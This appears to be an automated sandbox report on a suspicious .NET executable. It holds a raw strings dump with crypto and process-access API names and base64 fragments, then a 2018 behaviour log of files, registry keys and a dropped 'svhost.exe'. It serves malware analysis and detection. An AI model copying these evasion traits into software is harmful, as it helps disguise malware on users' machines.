5D
@,.&2
ConditionalCompareObjectEqual
cF&
Kgou
iFe"
i6	M
~^?S
31X=
^g&
2gl
e/{^
STrx;H
String
9[0C
cUUN
_CorExeMain
KJZx
c	#}
|)!W
g3P1
.^wF
P	6%
!)Kg4
pkbC
\+\-h
7{E
set_Key
{s.P
:
?z
"fujR
6"*6
c9w
X:p6E
t+XSd
DM//T
,R5B
kc>B%#
g::O
2I.1+
jLKD
M995
@jt
#e]m
oaWX
b~c
FileLoadException
`y&$K
9[>g
1N})'
Y|
<d
Microsoft.VisualBasic.CompilerServices
Lm2
<VJC*Q5
Is}|
" W2
pa3{gDI
lY!R*
.a\S
JVo#
mrOp
%4,BP
5| T
EditorBrowsableAttribute
O	*[
c9.
Jp)>
P:C3
1W^Q
1{i^
f{+&
+F..(
RL'l
4E%
2J]&
d2/%
<pHK
nu9(l
&hg6n
rJxL
{0e%
(?VY
0WBO
JR,F
Load
B*PZ
?[Y&
4f
5'7bje
NMJ)Q
Attribute
`Ywyn
2~!{L
NC/LYM
ldRbt
/]B/
bqY/
VB
fDxO
R6~6
lE s0u
=5o3
FrX!
EO5b)R
Dictionary`2
BeginInvoke
_Kf}
!&,u
?InK
j1OsWN?
am,
rKmp
$>k
get_OSVersion
S;{qR
YvC=
MjV5Q
N5y%9
}B
EO#C
-wQEx
b_+
A|j+{
Mm!rm
4zG^
7&]gS
pJ&p
DirectoryInfo
y[z,
Am7j
j;^-
!~D&
At>J
RuntimeHelpers
Njj%	+
LW'n@
~`E
,K&+2
qoQE
D
)Z
>wHF]6x.D
iUE0$6
get_Platform
.YBN
.kV'
f[H
ce%C
0f&KQ
Op;
Lbu&'+C
L 
[
N&gr#~
? 
/
|l
gDXq)
-b&&&&&
u}X|
J7`5
Ci &
K%#j
i<\8
Object
Kochq
oef/
JExB
U0v&"
{E1 ;
p`$^
_Z.T J
ndt7
BadImageFormatException
"lr_Y
gs :S
0a!A
b)i\
(b8=
(R
z
\9A
iG/R	bF
-b8=
;Vw\,
#-D:
_"d
O_Pg
HR6
/0#H.
e6W
rMNL
gfe;I
AttributeTargets
rvOD
EditorBrowsableState
(`&_
l+o1
/Jl{
|kHx
[htI
Gi4[
QfmP
1.0.0.0
tW}b
z,]"
^{?+
x`xJP9
DM+|
Kqx'
Wq"z
60Fi7e
L+W&
QG+l
_(j
mw[3
}ga(
Stream
<6s?4
get_Modules
_h
Q
UH9?
!5IM
lJmwW
kQ*r
IsNullOrEmpty
~4
<i,
F<KQ
aNy}o
jgDI
PM@`
Y1<q
=TUlH
_yeX
klSq<[
0UY
Exit
CompilationRelaxationsAttribute
x6Wz
bHqk
wti)
nO6b!
i
BT
[+12
$E"1
aR7j
=ctJw
`{_d
FOm:
_caHE8
EF7W
V%4%o
#m	i
A"W<
%>hr
cuu6
$5y
Ph
r-nu7{u
#oc&
2
nO@
]biR
O
0=
{;(Q
kkc&9vd
zwiYMT
U<Pd
;L
5
id6~r
`6Gov
assemblyFullName
FormatException
1nd*
OperatingSystem
-[lfom$
-GE;9
H#<G
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
f*~
Gp"E/Cd
System.ComponentModel
xMj?
nw3p
&5oS
tx?QT0UL
X(Z
$@aT
?e,k
$}Z{
P/i_
R$&?
System.Threading
^V^KT
w3	0'
JIo_5
a7HL
xxi2{
{/cz,
[%(--`
G}k[
dP;R
g=6WnY
e]	(.y
/]Cs
w	I-i
.wXz
LgPt
=MlC
;$w]N
XF	[xI
{gS1
pj2<5
LsEN
o]Xw
C\H,
]"?j
`1,t
/UJbIx
[nO
pm06
Buffer
get_Current
`X_N
eCCAK
YA:[
M*hh~
"s,
zC.E
c`	M
k
U;=
YG1
fU,}b
1?k!P|
]LF#
f5j6
1&K'
`N;v
+
O!
,HI55
Y=Ia
"fuq
/"]f
Qt{s
q|zS
\==Y
!jYB|
]V{d
:5y7
0lI
R9[}c
&-
Qt"
pnZY
p-l*
uQ9?
9<C}
{
&6
h&{N
A=
x
Ee.Z)
S"zQa
Hw5
|
9D/Q7
2UTI
XZt#
GY\k(
|p
_8Ipd
(J+_
oq#C:
=Yo
pf%d
*/u`
KillOnExit
9YQ\#
FIGD
}i)]B
get_Ticks
\|K`b
'LV
z
~3^Y
d@o^
K5A:;
ke	mt:=A,
N
2n
)B[E%
4]
I@5xk:"
N '@`
%,92
hx+l
?K.$
^XRkh
~V&M
v2.0.50727
1h=e8
s3C
9M-
{=WMR
RK D
3VE{
!'UE
0YeP
2Rnn
~5:
^6&a^
set_Item
O,Vh
MC>m_8
t3,a8
4P;]
%WMClA+vq
ehjf
l~
pbrv,
9'c
7G<
^ISf
;$Qd
>xmj
vyx
\3C./
m;g
:.A>
`S'g*h`
F@q,
i?W+
~kwp_CA
W`q_
Exception
PN0Y
^QyH
DC I
-Wg>*
QDFCMmMzRDRlNUY2ZzdIOA==
<+!z
j*r=
ut5FZ
<r#O
get_ASCII
UP2;
v)@%DT
	>M
eN6>tK
hVn&
c7k-sv
S[mK
YYxu|
MEm#
}
^'
<`*O
GetTypeFromHandle
IAsyncResult
s'H.
zGR?
#Q.S
"4<Sj#
GetEnumerator
gc5M
SymmetricAlgorithm
Z&!B
7xW\
7O>V
4d[K
QH!5]
nT\
GetDelegateForFunctionPointer
eiBj
,$_X
puJI
Int16
FfiKP
{KTnn
0r<g
ckdjY
CR@L
M?!=
A	I
|gh:
#HUh
? AzI*
[|yk
Enter
sB3x
NUghWr
kg+R
e$kjx
YFQmQ
\tGT
u/t[
E	NB
GetProcessById
Sr>k
%vQo
^C4<dN
\QDZ
^P48
7z`0
ConcatenateObject
DrzI
System.Runtime.InteropServices
AhN=
2]C7
OAld
Hd1R
~le+
D0Vy
Math
-D(Z
]x\pj
.9Pv
]OU8
+&++{
|xfl
v}$Z
6/=(O
>1Jy
&D:)
@FuH*}@
Qdy~n
e+787
handle
.Fw8
"|Bf
nu$
;0O<E
1Ix(P
System.Runtime.CompilerServices
;!5^
4!*
3//2
huKwyKm0
A)jU
#x$1lLCb
EpZb:
J
l1y%
hP(B
$BjS
8BkEzQy
=Tv
ygk2mlf
5@xdl
fd-%
/6N	j
xjcs_
{E+a
vQ11D
Z4Vw
?0*B
SL0l
6f@
TransformFinalBlock
?sMG
YzB;
n~(Hf
*Ry
;}o@
ta!q
5g$uz
VI4R
!G+
XeJr
r@;y
Close
.
[
F;
*|
IDisposable
Gmo4
Synchronized
kam_
)\js
F\:m9
`fj(k
&u]3v=
!3g1-
frdY`Qlw\
d&IO
C
^9U
Q8DW
5u{6
YM	Mom#
V"M	l
DRP
set_Mode
fX.G(
0^h
|&Ao
*2*C
I_nKQ
96_qv
cx*{%~
g&1;p
\].X~
j\1w
<Module>
kBQ3
ydpM
H"N
h|!i
lQc5,
X[Z!
@[!R
MulticastDelegate
{)9A
k706
LLw3
ComputeHash
-#s\%]
pWC+
kO>
6>~6
4Ae"o
c@s+
/V29
,|r4
ex*J
9zh%
'XE{a
wLDl
o4iJDcE;
A?Nt
-"7y"`9m
add_Idle
~q Gj
DciDY
2Gl~
lHlu
pu>]
CreateEncryptor
,R(tH+
%@RW7
`IAQ
cBoK
,k\
LtMEn
w}
d% {
Ba	v
"m7A
W2%S}T
>{#+|
$9pr
E|qb
EB}R
Ct<YE
AN'm
7Ww
`gxQw
YEn9
*tHr
>_ec
rP*W
d8sU
,P2`
Oog
ApplicationSettingsBase
e$%F.Y
{qdp
L4xRB
3#6DK|u
4i  >Y
ArgumentOutOfRangeException
E
E<
Mowa
"E?(
42.Q%[
>>_=
yk9'
{c7N
r#m_v
r[}:n
g)fK)
c}an
w?b8zS
EventHandler
N+]#*
Thread
A-Z
?i!_
Collect
{v{{aH
`LwoC
a$14
'{Kok
1wBo
X{An
jj>&
Encoding
#$mp
"Y+h
GE7~
J/m
get_CurrentThread
*EkF
Av-n
6K=<
2PS8
=l]`
smcz
wk{{
9s)X8p
get_Module
3F9+
j4
i
/'X#
fsdgsrxd.My
e9
:
DwH>
L)mD
[Zyi
[._N
Zr|7
1y~(
d4Q!
PD>"GV
x#=i
t
+sf
^cuji
4JQ|
:q; q
i'H;
OC7E
~Z1~
s$GX
gP(%6n^
#dVo
gcxd
OTNc
[xX?]
U0hBMQ==
x(R
W
m2{x
|'!'
\Y`
t#J\
Zero
yMt!f
|<s>
G!d9
=RHs
I3RoZW53Zm9sIw==
F>bN5B
3
!qu
;7YH
jDgN
%.Py
6fTPO
f\6V
SOaj
zE0?
dB\o
e{^>b
|.
|
b<uF
hn^(@n
@$X/9)
Cr.,
YC^N}}
L*nVN
u#g|L
2&SG
qzpC.
+<+A+F	(L
x3ve&
System.Collections.Generic
sPfo
fU[n
G{~y
EyQ,]*
`2n
e!*#
n"EY
L8V|9
F7A3
j>1'
System.Windows.Forms
w9}[]
zm[cUdN2
7$nx
@[mp.'
2ns"Eq*
OK#p
].BU#t
d8ly
Qn(<(
t=vxH
:hKW
A\:n
get_ModuleName
%-(/
$]
i
CHG9
BQ-Rg
Y|tE
fBhEq
bv}*
-d&&&&&
,YM
GeneratedCodeAttribute
^!#1
4,?.x
.4
Y
w!;/
3Jf>n\
(B7[
F
2T
TC+
-B~3
M"$l
7>M)^
((M7+
nF"[4l
B{[s
Sleep
Lt[v^
e~|&S
-AX
T5k/
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-07-09 23:04:14 2018-07-09 23:07:06 172

6 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-07-09 23:04:14 2018-07-09 23:07:06 172

9 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\i1.exe.config
C:\Users\Seven01\AppData\Local\Temp\i1.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\i1.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\i1.config
C:\Users\Seven01\AppData\Local\Temp\i1.INI
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46
C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46
C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46
C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.exe
C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it_96cbd02afd56cf46
C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it_96cbd02afd56cf46
C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it_96cbd02afd56cf46
C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.exe
C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll
C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll
C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe
C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe
C:\Windows\assembly
C:\Windows\assembly\Desktop.ini
C:\Windows\assembly\GAC_MSIL\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\0.0.0.0__3e56350693f7355e
C:\Users\Seven01\AppData\Local\Temp\svhost.exe
C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_32\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\i1.exe.config
C:\Users\Seven01\AppData\Local\Temp\i1.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe
C:\Windows\SysWOW64\ntdll.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\svhost.exe

Delete Files

C:\Users\Seven01\AppData\Local\Temp\svhost.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\i1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
